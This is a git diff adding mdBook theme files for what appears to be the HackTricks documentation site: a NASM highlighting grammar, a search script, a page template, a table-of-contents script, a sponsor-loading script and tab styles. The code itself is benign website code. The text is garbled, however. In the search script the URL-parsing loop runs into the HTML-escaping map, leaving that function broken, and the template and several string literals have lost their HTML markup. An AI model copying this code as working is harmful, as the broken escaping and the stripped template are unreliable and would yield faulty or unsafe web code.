rsp r8 r9 r10 r11 r12 r13 r14 r15 cs ds es fs gs ss st st0 st1 st2 st3 st4 st5 st6 st7 mm0 mm1 mm2 mm3 mm4 mm5 mm6 mm7 xmm0  xmm1  xmm2  xmm3  xmm4  xmm5  xmm6  xmm7  xmm8  xmm9 xmm10  xmm11 xmm12 xmm13 xmm14 xmm15 xmm16 xmm17 xmm18 xmm19 xmm20 xmm21 xmm22 xmm23 xmm24 xmm25 xmm26 xmm27 xmm28 xmm29 xmm30 xmm31 ymm0  ymm1  ymm2  ymm3  ymm4  ymm5  ymm6  ymm7  ymm8  ymm9 ymm10  ymm11 ymm12 ymm13 ymm14 ymm15 ymm16 ymm17 ymm18 ymm19 ymm20 ymm21 ymm22 ymm23 ymm24 ymm25 ymm26 ymm27 ymm28 ymm29 ymm30 ymm31 zmm0  zmm1  zmm2  zmm3  zmm4  zmm5  zmm6  zmm7  zmm8  zmm9 zmm10  zmm11 zmm12 zmm13 zmm14 zmm15 zmm16 zmm17 zmm18 zmm19 zmm20 zmm21 zmm22 zmm23 zmm24 zmm25 zmm26 zmm27 zmm28 zmm29 zmm30 zmm31 k0 k1 k2 k3 k4 k5 k6 k7 bnd0 bnd1 bnd2 bnd3 cr0 cr1 cr2 cr3 cr4 cr8 dr0 dr1 dr2 dr3 dr8 tr3 tr4 tr5 tr6 tr7 r0 r1 r2 r3 r4 r5 r6 r7 r0b r1b r2b r3b r4b r5b r6b r7b r0w r1w r2w r3w r4w r5w r6w r7w r0d r1d r2d r3d r4d r5d r6d r7d r0h r1h r2h r3h r0l r1l r2l r3l r4l r5l r6l r7l r8l r9l r10l r11l r12l r13l r14l r15l db dw dd dq dt ddq do dy dz resb resw resd resq rest resdq reso resy resz incbin equ times byte word dword qword nosplit rel abs seg wrt strict near far a32 ptr",meta:"%define %xdefine %+ %undef %defstr %deftok %assign %strcat %strlen %substr %rotate %elif %else %endif %if %ifmacro %ifctx %ifidn %ifidni %ifid %ifnum %ifstr %iftoken %ifempty %ifenv %error %warning %fatal %rep %endrep %include %push %pop %repl %pathsearch %depend %use %arg %stacksize %local %line %comment %endcomment .nolist __FILE__ __LINE__ __SECT__  __BITS__ __OUTPUT_FORMAT__ __DATE__ __TIME__ __DATE_NUM__ __TIME_NUM__ __UTC_DATE__ __UTC_TIME__ __UTC_DATE_NUM__ __UTC_TIME_NUM__  __PASS__ struc endstruc istruc at iend align alignb sectalign daz nodaz up down zero default option assume public bits use16 use32 use64 default section segment absolute extern global common cpu float __utf16__ __utf16le__ __utf16be__ __utf32__ __utf32le__ __utf32be__ __float8__ __float16__ __float32__ __float64__ __float80m__ __float80e__ __float128l__ __float128h__ __Infinity__ __QNaN__ __SNaN__ Inf NaN QNaN SNaN float8 float16 float32 float64 float80m float80e float128l float128h __FLOAT_DAZ__ __FLOAT_ROUND__ __FLOAT__"},contains:[s.COMMENT(";","$",{relevance:0}),{className:"number",variants:[{begin:"\\b(?:([0-9][0-9_]*)?\\.[0-9_]*(?:[eE][+-]?[0-9_]+)?|(0[Xx])?[0-9][0-9_]*\\.?[0-9_]*(?:[pP](?:[+-]?[0-9_]+)?)?)\\b",relevance:0},{begin:"\\$[0-9][0-9A-Fa-f]*",relevance:0},{begin:"\\b(?:[0-9A-Fa-f][0-9A-Fa-f_]*[Hh]|[0-9][0-9_]*[DdTt]?|[0-7][0-7_]*[QqOo]|[0-1][0-1_]*[BbYy])\\b"},{begin:"\\b(?:0[Xx][0-9A-Fa-f_]+|0[DdTt][0-9_]+|0[QqOo][0-7_]+|0[BbYy][0-1_]+)\\b"}]},s.QUOTE_STRING_MODE,{className:"string",variants:[{begin:"'",end:"[^\\\\]'"},{begin:"`",end:"[^\\\\]`"}],relevance:0},{className:"symbol",variants:[{begin:"^\\s*[A-Za-z._?][A-Za-z0-9_$#@~.?]*(:|\\s+label)"},{begin:"^\\s*%%[A-Za-z0-9_$#@~.?]*:"}],relevance:0},{className:"subst",begin:"%[0-9]+",relevance:0},{className:"subst",begin:"%!S+",relevance:0},{className:"meta",begin:/^\s*\.[\w_-]+/}]}}}());
\ No newline at end of file
diff --git a/theme/ht_searcher.js b/theme/ht_searcher.js
new file mode 100644
index 000000000..1cee01a8c
--- /dev/null
+++ b/theme/ht_searcher.js
@@ -0,0 +1,486 @@
+"use strict";
+window.search = window.search || {};
+(function search(search) {
+    // Search functionality
+    //
+    // You can use !hasFocus() to prevent keyhandling in your key
+    // event handlers while the user is typing their search.
+
+    if (!Mark || !elasticlunr) {
+        return;
+    }
+
+    //IE 11 Compatibility from https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
+    if (!String.prototype.startsWith) {
+        String.prototype.startsWith = function(search, pos) {
+            return this.substr(!pos || pos < 0 ? 0 : +pos, search.length) === search;
+        };
+    }
+
+    var search_wrap = document.getElementById('search-wrapper'),
+        search_modal = document.getElementById('search-modal'),
+        searchbar = document.getElementById('searchbar'),
+        searchbar_outer = document.getElementById('searchbar-outer'),
+        searchresults = document.getElementById('searchresults'),
+        searchresults_outer = document.getElementById('searchresults-outer'),
+        searchresults_header = document.getElementById('searchresults-header'),
+        searchicon = document.getElementById('search-toggle'),
+        content = document.getElementById('content'),
+
+        searchindex = null,
+        doc_urls = [],
+        results_options = {
+            teaser_word_count: 30,
+            limit_results: 30,
+        },
+        search_options = {
+            bool: "AND",
+            expand: true,
+            fields: {
+                title: {boost: 1},
+                body: {boost: 1},
+                breadcrumbs: {boost: 0}
+            }
+        },
+        mark_exclude = [],
+        marker = new Mark(content),
+        current_searchterm = "",
+        URL_SEARCH_PARAM = 'search',
+        URL_MARK_PARAM = 'highlight',
+        teaser_count = 0,
+
+        SEARCH_HOTKEY_KEYCODE = 83,
+        ESCAPE_KEYCODE = 27,
+        DOWN_KEYCODE = 40,
+        UP_KEYCODE = 38,
+        SELECT_KEYCODE = 13;
+
+    function hasFocus() {
+        return searchbar === document.activeElement;
+    }
+
+    function removeChildren(elem) {
+        while (elem.firstChild) {
+            elem.removeChild(elem.firstChild);
+        }
+    }
+
+    // Helper to parse a url into its building blocks.
+    function parseURL(url) {
+        var a =  document.createElement('a');
+        a.href = url;
+        return {
+            source: url,
+            protocol: a.protocol.replace(':',''),
+            host: a.hostname,
+            port: a.port,
+            params: (function(){
+                var ret = {};
+                var seg = a.search.replace(/^\?/,'').split('&');
+                var len = seg.length, i = 0, s;
+                for (;i': '>',
+            '"': '"',
+            "'": '''
+        };
+        var repl = function(c) { return MAP[c]; };
+        return function(s) {
+            return s.replace(/[&<>'"]/g, repl);
+        };
+    })();
+    
+    function formatSearchMetric(count, searchterm) {
+        if (count == 1) {
+            return count + " search result for '" + searchterm + "':";
+        } else if (count == 0) {
+            return "No search results for '" + searchterm + "'.";
+        } else {
+            return count + " search results for '" + searchterm + "':";
+        }
+    }
+    
+    function formatSearchResult(result, searchterms) {
+        var teaser = makeTeaser(escapeHTML(result.doc.body), searchterms);
+        teaser_count++;
+
+        // The ?URL_MARK_PARAM= parameter belongs inbetween the page and the #heading-anchor
+        var url = doc_urls[result.ref].split("#");
+        if (url.length == 1) { // no anchor found
+            url.push("");
+        }
+
+        // encodeURIComponent escapes all chars that could allow an XSS except
+        // for '. Due to that we also manually replace ' with its url-encoded
+        // representation (%27).
+        var searchterms = encodeURIComponent(searchterms.join(" ")).replace(/\'/g, "%27");
+
+        return '' + result.doc.breadcrumbs 
+            + '' 
+            + teaser + '' + '';
+    }
+    
+    function makeTeaser(body, searchterms) {
+        // The strategy is as follows:
+        // First, assign a value to each word in the document:
+        //  Words that correspond to search terms (stemmer aware): 40
+        //  Normal words: 2
+        //  First word in a sentence: 8
+        // Then use a sliding window with a constant number of words and count the
+        // sum of the values of the words within the window. Then use the window that got the
+        // maximum sum. If there are multiple maximas, then get the last one.
+        // Enclose the terms in .
+        var stemmed_searchterms = searchterms.map(function(w) {
+            return elasticlunr.stemmer(w.toLowerCase());
+        });
+        var searchterm_weight = 40;
+        var weighted = []; // contains elements of ["word", weight, index_in_document]
+        // split in sentences, then words
+        var sentences = body.toLowerCase().split('. ');
+        var index = 0;
+        var value = 0;
+        var searchterm_found = false;
+        for (var sentenceindex in sentences) {
+            var words = sentences[sentenceindex].split(' ');
+            value = 8;
+            for (var wordindex in words) {
+                var word = words[wordindex];
+                if (word.length > 0) {
+                    for (var searchtermindex in stemmed_searchterms) {
+                        if (elasticlunr.stemmer(word).startsWith(stemmed_searchterms[searchtermindex])) {
+                            value = searchterm_weight;
+                            searchterm_found = true;
+                        }
+                    };
+                    weighted.push([word, value, index]);
+                    value = 2;
+                }
+                index += word.length;
+                index += 1; // ' ' or '.' if last word in sentence
+            };
+            index += 1; // because we split at a two-char boundary '. '
+        };
+
+        if (weighted.length == 0) {
+            return body;
+        }
+
+        var window_weight = [];
+        var window_size = Math.min(weighted.length, results_options.teaser_word_count);
+
+        var cur_sum = 0;
+        for (var wordindex = 0; wordindex < window_size; wordindex++) {
+            cur_sum += weighted[wordindex][1];
+        };
+        window_weight.push(cur_sum);
+        for (var wordindex = 0; wordindex < weighted.length - window_size; wordindex++) {
+            cur_sum -= weighted[wordindex][1];
+            cur_sum += weighted[wordindex + window_size][1];
+            window_weight.push(cur_sum);
+        };
+
+        if (searchterm_found) {
+            var max_sum = 0;
+            var max_sum_window_index = 0;
+            // backwards
+            for (var i = window_weight.length - 1; i >= 0; i--) {
+                if (window_weight[i] > max_sum) {
+                    max_sum = window_weight[i];
+                    max_sum_window_index = i;
+                }
+            };
+        } else {
+            max_sum_window_index = 0;
+        }
+
+        // add  around searchterms
+        var teaser_split = [];
+        var index = weighted[max_sum_window_index][2];
+        for (var i = max_sum_window_index; i < max_sum_window_index+window_size; i++) {
+            var word = weighted[i];
+            if (index < word[2]) {
+                // missing text from index to start of `word`
+                teaser_split.push(body.substring(index, word[2]));
+                index = word[2];
+            }
+            if (word[1] == searchterm_weight) {
+                teaser_split.push("")
+            }
+            index = word[2] + word[0].length;
+            teaser_split.push(body.substring(word[2], index));
+            if (word[1] == searchterm_weight) {
+                teaser_split.push("")
+            }
+        };
+
+        return teaser_split.join('');
+    }
+
+    function init(config) {
+        results_options = config.results_options;
+        search_options = config.search_options;
+        searchbar_outer = config.searchbar_outer;
+        doc_urls = config.doc_urls;
+        searchindex = elasticlunr.Index.load(config.index);
+
+        // Set up events
+        searchicon.addEventListener('click', function(e) { searchIconClickHandler(); }, false);
+        search_wrap.addEventListener('click', function(e) { searchIconClickHandler(); }, false);
+        search_modal.addEventListener('click', function(e) { e.stopPropagation(); }, false);
+        searchbar.addEventListener('keyup', function(e) { searchbarKeyUpHandler(); }, false);
+        document.addEventListener('keydown', function(e) { globalKeyHandler(e); }, false);
+        // If the user uses the browser buttons, do the same as if a reload happened
+        window.onpopstate = function(e) { doSearchOrMarkFromUrl(); };
+        // Suppress "submit" events so the page doesn't reload when the user presses Enter
+        document.addEventListener('submit', function(e) { e.preventDefault(); }, false);
+
+        // If reloaded, do the search or mark again, depending on the current url parameters
+        doSearchOrMarkFromUrl();
+    }
+    
+    function unfocusSearchbar() {
+        // hacky, but just focusing a div only works once
+        var tmp = document.createElement('input');
+        tmp.setAttribute('style', 'position: absolute; opacity: 0;');
+        searchicon.appendChild(tmp);
+        tmp.focus();
+        tmp.remove();
+    }
+    
+    // On reload or browser history backwards/forwards events, parse the url and do search or mark
+    function doSearchOrMarkFromUrl() {
+        // Check current URL for search request
+        var url = parseURL(window.location.href);
+        if (url.params.hasOwnProperty(URL_SEARCH_PARAM)
+            && url.params[URL_SEARCH_PARAM] != "") {
+            showSearch(true);
+            searchbar.value = decodeURIComponent(
+                (url.params[URL_SEARCH_PARAM]+'').replace(/\+/g, '%20'));
+            searchbarKeyUpHandler(); // -> doSearch()
+        } else {
+            showSearch(false);
+        }
+
+        if (url.params.hasOwnProperty(URL_MARK_PARAM)) {
+            var words = decodeURIComponent(url.params[URL_MARK_PARAM]).split(' ');
+            marker.mark(words, {
+                exclude: mark_exclude
+            });
+
+            var markers = document.querySelectorAll("mark");
+            function hide() {
+                for (var i = 0; i < markers.length; i++) {
+                    markers[i].classList.add("fade-out");
+                    window.setTimeout(function(e) { marker.unmark(); }, 300);
+                }
+            }
+            for (var i = 0; i < markers.length; i++) {
+                markers[i].addEventListener('click', hide);
+            }
+        }
+    }
+    
+    // Eventhandler for keyevents on `document`
+    function globalKeyHandler(e) {
+        if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey || e.target.type === 'textarea' || e.target.type === 'text' || !hasFocus() && /^(?:input|select|textarea)$/i.test(e.target.nodeName)) { return; }
+
+        if (e.keyCode === ESCAPE_KEYCODE) {
+            e.preventDefault();
+            searchbar.classList.remove("active");
+            setSearchUrlParameters("",
+                (searchbar.value.trim() !== "") ? "push" : "replace");
+            if (hasFocus()) {
+                unfocusSearchbar();
+            }
+            showSearch(false);
+            marker.unmark();
+        } else if (!hasFocus() && e.keyCode === SEARCH_HOTKEY_KEYCODE) {
+            e.preventDefault();
+            showSearch(true);
+            window.scrollTo(0, 0);
+            searchbar.select();
+        } else if (hasFocus() && e.keyCode === DOWN_KEYCODE) {
+            e.preventDefault();
+            unfocusSearchbar();
+            searchresults.firstElementChild.classList.add("focus");
+        } else if (!hasFocus() && (e.keyCode === DOWN_KEYCODE
+                                || e.keyCode === UP_KEYCODE
+                                || e.keyCode === SELECT_KEYCODE)) {
+            // not `:focus` because browser does annoying scrolling
+            var focused = searchresults.querySelector("li.focus");
+            if (!focused) return;
+            e.preventDefault();
+            if (e.keyCode === DOWN_KEYCODE) {
+                var next = focused.nextElementSibling;
+                if (next) {
+                    focused.classList.remove("focus");
+                    next.classList.add("focus");
+                }
+            } else if (e.keyCode === UP_KEYCODE) {
+                focused.classList.remove("focus");
+                var prev = focused.previousElementSibling;
+                if (prev) {
+                    prev.classList.add("focus");
+                } else {
+                    searchbar.select();
+                }
+            } else { // SELECT_KEYCODE
+                window.location.assign(focused.querySelector('a'));
+            }
+        }
+    }
+    
+    function showSearch(yes) {
+        if (yes) {
+            search_wrap.classList.remove('hidden');
+            searchicon.setAttribute('aria-expanded', 'true');
+        } else {
+            search_wrap.classList.add('hidden');
+            searchicon.setAttribute('aria-expanded', 'false');
+            var results = searchresults.children;
+            for (var i = 0; i < results.length; i++) {
+                results[i].classList.remove("focus");
+            }
+        }
+    }
+
+    function showResults(yes) {
+        if (yes) {
+            searchresults_outer.classList.remove('hidden');
+        } else {
+            searchresults_outer.classList.add('hidden');
+        }
+    }
+
+    // Eventhandler for search icon
+    function searchIconClickHandler() {
+        if (search_wrap.classList.contains('hidden')) {
+            showSearch(true);
+            window.scrollTo(0, 0);
+            searchbar.select();
+        } else {
+            showSearch(false);
+        }
+    }
+    
+    // Eventhandler for keyevents while the searchbar is focused
+    function searchbarKeyUpHandler() {
+        var searchterm = searchbar.value.trim();
+        if (searchterm != "") {
+            searchbar.classList.add("active");
+            doSearch(searchterm);
+        } else {
+            searchbar.classList.remove("active");
+            showResults(false);
+            removeChildren(searchresults);
+        }
+
+        setSearchUrlParameters(searchterm, "push_if_new_search_else_replace");
+
+        // Remove marks
+        marker.unmark();
+    }
+    
+    // Update current url with ?URL_SEARCH_PARAM= parameter, remove ?URL_MARK_PARAM and #heading-anchor .
+    // `action` can be one of "push", "replace", "push_if_new_search_else_replace"
+    // and replaces or pushes a new browser history item.
+    // "push_if_new_search_else_replace" pushes if there is no `?URL_SEARCH_PARAM=abc` yet.
+    function setSearchUrlParameters(searchterm, action) {
+        var url = parseURL(window.location.href);
+        var first_search = ! url.params.hasOwnProperty(URL_SEARCH_PARAM);
+        if (searchterm != "" || action == "push_if_new_search_else_replace") {
+            url.params[URL_SEARCH_PARAM] = searchterm;
+            delete url.params[URL_MARK_PARAM];
+            url.hash = "";
+        } else {
+            delete url.params[URL_MARK_PARAM];
+            delete url.params[URL_SEARCH_PARAM];
+        }
+        // A new search will also add a new history item, so the user can go back
+        // to the page prior to searching. A updated search term will only replace
+        // the url.
+        if (action == "push" || (action == "push_if_new_search_else_replace" && first_search) ) {
+            history.pushState({}, document.title, renderURL(url));
+        } else if (action == "replace" || (action == "push_if_new_search_else_replace" && !first_search) ) {
+            history.replaceState({}, document.title, renderURL(url));
+        }
+    }
+    
+    function doSearch(searchterm) {
+
+        // Don't search the same twice
+        if (current_searchterm == searchterm) { return; }
+        else { current_searchterm = searchterm; }
+
+        if (searchindex == null) { return; }
+
+        // Do the actual search
+        var results = searchindex.search(searchterm, search_options);
+        var resultcount = Math.min(results.length, results_options.limit_results);
+
+        // Display search metrics
+        searchresults_header.innerText = formatSearchMetric(resultcount, searchterm);
+
+        // Clear and insert results
+        var searchterms  = searchterm.split(' ');
+        removeChildren(searchresults);
+        for(var i = 0; i < resultcount ; i++){
+            var resultElem = document.createElement('li');
+            resultElem.innerHTML = formatSearchResult(results[i], searchterms);
+            searchresults.appendChild(resultElem);
+        }
+
+        // Display results
+        showResults(true);
+    }
+
+    fetch(path_to_root + 'searchindex.json')
+        .then(response => response.json())
+        .then(json => init(json))        
+        .catch(error => { // Try to load searchindex.js if fetch failed
+            var script = document.createElement('script');
+            script.src = path_to_root + 'searchindex.js';
+            script.onload = () => init(window.search);
+            document.head.appendChild(script);
+        });
+
+    // Exported functions
+    search.hasFocus = hasFocus;
+})(window.search);
\ No newline at end of file
diff --git a/theme/index.hbs b/theme/index.hbs
new file mode 100644
index 000000000..ecd2565f4
--- /dev/null
+++ b/theme/index.hbs
@@ -0,0 +1,392 @@
+
+
+    
+        
+        
+        {{ title }}
+        {{#if is_print }}
+        
+        {{/if}}
+        {{#if base_url}}
+        
+        {{/if}}
+
+        
+        {{> head}}
+
+        
+        
+        
+
+        {{#if favicon_svg}}
+        
+        {{/if}}
+        {{#if favicon_png}}
+        
+        {{/if}}
+        
+        
+        
+        {{#if print_enable}}
+        
+        {{/if}}
+
+        
+        
+        {{#if copy_fonts}}
+        
+        {{/if}}
+
+        
+        
+        
+        
+
+        
+        {{#each additional_css}}
+        
+        {{/each}}
+
+        {{#if mathjax_support}}
+        
+        
+        {{/if}}
+
+        
+        
+        
+        
+    
+    
+    

+        
+        
+
+        
+        
+
+        
+
+        
+        
+
+        

+            {{#if search_enabled}}
+            
+            {{/if}}
+
+            

+                {{> header}}
+                
+                
+                

+                    
+                    
+                    
+
+                    

+                        

+                            

+
+                            
+                                
+                                

+                                

+                                

+                                

+                                

+                            
+                            

+                            {{{ content }}}
+                        

+
+                        
+
+                        
+                    

+
+                    

+                        

+                            
+                            
+                                
+                                
+                                
+                                
+                            
+                        

+                    

+                

+                

+                    

+                        

+                            
+                            {{!--  --}}
+                            
+                        

+                    

+                

+            

+
+
+
+        

+
+        {{#if live_reload_endpoint}}
+        
+        
+        {{/if}}
+
+        {{#if google_analytics}}
+        
+        
+        {{/if}}
+
+        {{#if playground_line_numbers}}
+        
+        {{/if}}
+
+        {{#if playground_copyable}}
+        
+        {{/if}}
+
+        {{#if playground_js}}
+        
+        
+        
+        
+        
+        {{/if}}
+
+        {{#if search_js}}
+        
+        
+        
+        {{/if}}
+
+        
+        
+        
+
+        
+        {{#each additional_js}}
+        
+        {{/each}}
+
+        
+        
+
+
+        {{#if is_print}}
+        {{#if mathjax_support}}
+        
+        {{else}}
+        
+        {{/if}}
+        {{/if}}
+
+    

+    
+
diff --git a/theme/pagetoc.css b/theme/pagetoc.css
new file mode 100644
index 000000000..d979c7427
--- /dev/null
+++ b/theme/pagetoc.css
@@ -0,0 +1,189 @@
+@media only screen and (max-width:1439px) {
+    .sidetoc {
+        display: none !important;
+    }
+    .mobilesponsor {
+        margin-top: 25px;
+        max-height: 40%;
+        height: 40%;
+        background-color: var(--bg);
+        border: 1px solid var(--table-border-color);
+        border-radius: 8px;
+        padding: 5px;
+        display: none; /*changed via JS once ad is loaded*/
+        flex-direction: column;
+        text-decoration: none !important;
+    }
+    .mobilesponsor img {
+        height: auto;
+        width: 40%;
+        padding: 10px;        
+        transition-property: all;
+        transition-timing-function: cubic-bezier(.4,0,.2,1);
+        transition-duration: .3s;
+    }
+    /* .mobilesponsor:hover img{
+       width: 30%;
+    } */
+    .mobilesponsor .mobilesponsor-title{
+        margin-top: 5px;
+        margin-bottom: 5px;
+        margin-left: 15px;
+        margin-right: 15px;
+        font-weight: 800;
+        font-size: 2rem;
+        color: var(--sponsor-fg);
+    }
+    .mobilesponsor .mobilesponsor-description{
+        display:block;
+        margin-top: 5px;
+        margin-bottom: 15px;
+        margin-left: 15px;
+        margin-right: 15px;
+        color: var(--sponsor-fg);        
+        transition-property: all;
+        transition-timing-function: cubic-bezier(.4,0,.2,1);
+        transition-duration: .3s;
+    }
+    /* .mobilesponsor:hover .mobilesponsor-description{
+        display:block;
+    } */
+    .mobilesponsor .mobilesponsor-cta{
+        margin-top: auto;
+        margin-bottom: 10px;
+        margin-left: 20px;
+        margin-right: 20px;
+        text-align: center;
+        padding: 7px;
+        border-radius: 8px;
+        background-color: var(--fg);
+        color: var(--bg);
+    }
+}
+
+@media only screen and (min-width:1440px) {
+    main {
+        position: relative;
+    }
+    .sidetoc {
+        width: 250px;
+        margin-top: 25px;
+    }
+    .sidetoc-wrapper {
+        position: fixed;
+        width: 250px;
+        height: calc(100vh - var(--menu-bar-height)  - 25px * 2);
+        overflow: auto;
+        display: flex;
+        flex-direction: column;
+        gap:20px;
+    }
+    .pagetoc {
+        max-height: 60%;
+        overflow: auto;
+        border-left: 1px solid var(--table-border-color);
+    }
+    .sidesponsor {
+        max-height: 40%;
+        height: 40%;
+        background-color: var(--bg);
+        border: 1px solid var(--table-border-color);
+        border-radius: 8px;
+        padding: 5px;
+        display: none; /*changed via JS once ad is loaded*/
+        flex-direction: column;
+        text-decoration: none !important;
+    }
+    .sidesponsor img {
+        height: auto;
+        width: 60%;
+        padding: 10px;        
+        transition-property: all;
+        transition-timing-function: cubic-bezier(.4,0,.2,1);
+        transition-duration: .3s;
+    }
+    .sidesponsor:hover img{
+       width: 30%;
+    }
+    .sidesponsor .sponsor-title{
+        margin-top: 5px;
+        margin-bottom: 5px;
+        margin-left: 15px;
+        margin-right: 15px;
+        font-weight: 800;
+        font-size: 2rem;
+        color: var(--sponsor-fg);
+    }
+    .sidesponsor .sponsor-description{
+        display:none;
+        margin-top: 5px;
+        margin-bottom: 15px;
+        margin-left: 15px;
+        margin-right: 15px;
+        color: var(--sponsor-fg);        
+        transition-property: all;
+        transition-timing-function: cubic-bezier(.4,0,.2,1);
+        transition-duration: .3s;
+        overflow: scroll;
+    }
+    .sidesponsor:hover .sponsor-description{
+        display:block;
+
+    }
+    .sidesponsor .sponsor-cta{
+        margin-top: auto;
+        margin-bottom: 10px;
+        margin-left: 20px;
+        margin-right: 20px;
+        text-align: center;
+        padding: 7px;
+        border-radius: 8px;
+        background-color: var(--fg);
+        color: var(--bg);
+    }
+    .mobilesponsor-wrapper {
+        display: none !important;
+    }
+
+    .pagetoc a {
+        border-left: 1px solid var(--sidebar-bg);
+        color: var(--fg) !important;
+        display: block;
+        padding-bottom: 5px;
+        padding-top: 5px;
+        padding-left: 10px;
+        padding-right: 10px;
+        text-align: left;
+        text-decoration: none;
+        text-overflow: ellipsis;
+        line-clamp: 2;
+        -webkit-line-clamp: 2;
+        -webkit-box-orient: vertical;
+        overflow: hidden;
+    }
+    .pagetoc a:hover {
+        background: var(--sidebar-bg-hover);
+        color: var(--sidebar-active) !important;
+        border-radius: 5px;
+    }
+    .pagetoc a.active {
+        background: var(--sidebar-bg-hover);
+        color: var(--sidebar-active) !important;
+        border-radius: 5px;
+    }
+    .pagetoc .pagetoc-H2 {
+        padding-left: 20px;
+    }
+    .pagetoc .pagetoc-H3 {
+        padding-left: 40px;
+    }
+    .pagetoc .pagetoc-H4 {
+        padding-left: 60px;
+    }
+    .pagetoc .pagetoc-H5 {
+        display: none;
+    }
+    .pagetoc .pagetoc-H6 {
+        display: none;
+    }
+}
diff --git a/theme/pagetoc.js b/theme/pagetoc.js
new file mode 100644
index 000000000..5962db9f3
--- /dev/null
+++ b/theme/pagetoc.js
@@ -0,0 +1,68 @@
+let scrollTimeout;
+
+const listenActive = () => {
+  const elems = document.querySelector(".pagetoc").children;
+  [...elems].forEach(el => {
+    el.addEventListener("click", (event) => {
+      clearTimeout(scrollTimeout);
+      [...elems].forEach(el => el.classList.remove("active"));
+      el.classList.add("active");
+      // Prevent scroll updates for a short period
+      scrollTimeout = setTimeout(() => {
+        scrollTimeout = null;
+      }, 100); // Adjust timing as needed
+    });
+  });
+};
+
+const getPagetoc = () => document.querySelector(".pagetoc") || autoCreatePagetoc();
+
+const autoCreatePagetoc = () => {
+  const main = document.querySelector("#content > main");
+  const content = Object.assign(document.createElement("div"), {
+    className: "content-wrap"
+  });
+  content.append(...main.childNodes);
+  main.prepend(content);
+  main.insertAdjacentHTML("afterbegin", '
');
+  return document.querySelector(".pagetoc");
+};
+const updateFunction = () => {
+  if (scrollTimeout) return; // Skip updates if within the cooldown period from a click
+  const headers = [...document.getElementsByClassName("header")];
+  const scrolledY = window.scrollY;
+  let lastHeader = null;
+
+  // Find the last header that is above the current scroll position
+  for (let i = headers.length - 1; i >= 0; i--) {
+    if (scrolledY >= headers[i].offsetTop) {
+      lastHeader = headers[i];
+      break;
+    }
+  }
+
+  const pagetocLinks = [...document.querySelector(".pagetoc").children];
+  pagetocLinks.forEach(link => link.classList.remove("active"));
+
+  if (lastHeader) {
+    const activeLink = pagetocLinks.find(link => lastHeader.href === link.href);
+    if (activeLink) activeLink.classList.add("active");
+  }
+};
+
+window.addEventListener('load', () => {
+  const pagetoc = getPagetoc();
+  const headers = [...document.getElementsByClassName("header")];
+  headers.forEach(header => {
+    const link = Object.assign(document.createElement("a"), {
+      textContent: header.text,
+      href: header.href,
+      className: `pagetoc-${header.parentElement.tagName}`
+    });
+    pagetoc.appendChild(link);
+  });
+  updateFunction();
+  listenActive();
+  window.addEventListener("scroll", updateFunction);
+});
+
diff --git a/theme/sponsor.js b/theme/sponsor.js
new file mode 100644
index 000000000..4875d91f8
--- /dev/null
+++ b/theme/sponsor.js
@@ -0,0 +1,58 @@
+;(function sponsor() {
+  var sponsorSide = document.querySelector(".sidesponsor")
+  var sponsorImg = sponsorSide.querySelector(".sidesponsor img")
+  var sponsorTitle = sponsorSide.querySelector(".sponsor-title")
+  var sponsorDescription = sponsorSide.querySelector(".sponsor-description")
+  var sponsorCTA = sponsorSide.querySelector(".sponsor-cta")
+  var mobilesponsorSide = document.querySelector(".mobilesponsor")
+  var mobilesponsorImg = mobilesponsorSide.querySelector(".mobilesponsor img")
+  var mobilesponsorTitle = mobilesponsorSide.querySelector(
+    ".mobilesponsor-title"
+  )
+  var mobilesponsorDescription = mobilesponsorSide.querySelector(
+    ".mobilesponsor-description"
+  )
+  var mobilesponsorCTA = mobilesponsorSide.querySelector(".mobilesponsor-cta")
+
+  async function getSponsor() {
+    const url = "https://cloud.hacktricks.wiki/sponsor"
+    try {
+      const response = await fetch(url, { method: "GET" })
+      if (!response.ok) {
+        console.log(response)
+        throw new Error(`Response status: ${response.status}`)
+      }
+
+      const json = await response.json()
+      var sponsor = json.sponsor
+      console.log("boop", sponsor)
+      sponsorImg.src = sponsor.image_url
+      sponsorTitle.textContent = sponsor.name
+      sponsorDescription.innerHTML = sponsor.description
+      sponsorSide.href = sponsor.link
+      sponsorCTA.textContent = sponsor.cta
+      sponsorSide.style.display = "flex"
+
+      mobilesponsorImg.src = sponsor.image_url
+      mobilesponsorTitle.textContent = sponsor.name
+      mobilesponsorDescription.innerHTML = sponsor.description
+      mobilesponsorSide.href = sponsor.link
+      mobilesponsorCTA.textContent = sponsor.cta
+      mobilesponsorSide.style.display = "flex"
+
+      if (sponsor.name.length > 45) {
+        sponsorTitle.style.fontSize = "1.6rem"
+        mobilesponsorTitle.style.fontSize = "1.6rem"
+      }
+
+      if (sponsor.description.length > 250) {
+        sponsorDescription.style.fontSize = "1.4rem"
+        mobilesponsorDescription.style.fontSize = "1.4rem"
+      }
+    } catch (error) {
+      console.error(error.message)
+    }
+  }
+
+  getSponsor()
+})()
diff --git a/theme/tabs.css b/theme/tabs.css
new file mode 100644
index 000000000..07a4dec9d
--- /dev/null
+++ b/theme/tabs.css
@@ -0,0 +1,41 @@
+.mdbook-tabs-container{
+    background-color: var(--bg);
+    border: 1px solid var(--table-border-color);
+    border-radius: 8px;
+}
+
+.mdbook-tabs {
+    display: flex;
+    margin-top: 0 !important;
+}
+
+.mdbook-tab {
+    background-color: var(--bg);
+    padding: 0.5rem 1rem;
+    cursor: pointer;
+    border: none;
+    font-size: 1.6rem;
+    line-height: 1.45em;
+    color: var(--icons-hover);
+}
+
+.mdbook-tab:hover {
+    color: var(--icons);
+}
+
+.mdbook-tab.active {
+    background-color: var(--theme-hover);
+    color: var(--icons);
+}
+
+.mdbook-tab-content {
+    padding: 1.2rem;
+}
+
+.mdbook-tab-content table {
+    margin: unset;
+}
+
+.mdbook-tab-content pre {
+    margin: unset;
+}
diff --git a/theme/tabs.js b/theme/tabs.js
new file mode 100644
index 000000000..8ba5e878c
--- /dev/null
+++ b/theme/tabs.js
@@ -0,0 +1,75 @@
+/**
+ * Change active tab of tabs.
+ *
+ * @param {Element} container
+ * @param {string} name
+ */
+const changeTab = (container, name) => {
+    for (const child of container.children) {
+        if (!(child instanceof HTMLElement)) {
+            continue;
+        }
+
+        if (child.classList.contains('mdbook-tabs')) {
+            for (const tab of child.children) {
+                if (!(tab instanceof HTMLElement)) {
+                    continue;
+                }
+
+                if (tab.dataset.tabname === name) {
+                    tab.classList.add('active');
+                } else {
+                    tab.classList.remove('active');
+                }
+            }
+        } else if (child.classList.contains('mdbook-tab-content')) {
+            if (child.dataset.tabname === name) {
